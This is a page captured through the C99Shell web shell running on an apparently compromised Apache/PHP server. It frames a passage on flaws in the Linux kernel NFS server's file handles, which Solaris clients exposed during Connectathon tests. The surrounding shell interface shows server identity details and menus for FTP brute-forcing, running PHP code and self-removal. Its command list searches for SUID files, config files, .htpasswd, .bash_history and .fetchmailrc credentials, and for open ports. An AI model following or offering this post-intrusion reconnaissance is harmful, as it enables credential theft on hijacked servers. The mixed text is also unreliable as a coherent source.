!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t 

Safe-mode: OFF (not secure)

/usr/bin/X11/./../../share/doc/MySQL-python-1.2.0/../perl-LDAP-0.33/../nfs-utils-1.0.7/   drwxr-xr-x
Free 4.93 GB of 27.03 GB (18.24%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     node7.html (4.06 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

The Kernel-Space NFS Server

The Connectathon testsuites revealed several flaws in the NFS server implementation in the Linux kernel 2.2.9. The test result from Solaris clients showed that the Solaris NFS client assumes:

• Files are unstructured streams of uninterpreted bytes.

• If 2 file handles from the same server are identical, they represent the same file on the server.

• If 2 file handles from the same server are different, they must represent the different files on the server.

• All the hard links should be represented by the same file handle

• When a client renames a file within the same file system, the file handle should be unchanged.

However, two fields in the file handle in the Linux NFS server, fb_dentry and fb_dirino, make Solaris's assumption untrue.

fb_dentry is for dentry, which is the internal part for the Linux file system. It determined by pathname. That implies several things:

• When a pathname is deleted and then created, their dentries will be the same although they are different files.

• The hard links have different dentries.

• Rename will lead to different dentries.

Those make dentry very unsuitable for file handle. Even worse, dentry is a memory pointer. That means the file handle from the Linux NFS server is not persistent. When the server is rebooted, the file handlers which clients have may become stale and for the same file the Linux NFS server may return a different file handle.

:: Command execute ::

Enter:

Select: -----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports

:: Search ::   - regexp

:: Upload ::   [ Read-Only ]

:: Make Dir ::   [ Read-Only ]

:: Make File ::   [ Read-Only ]

:: Go Dir ::

:: Go File ::

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0036 ]--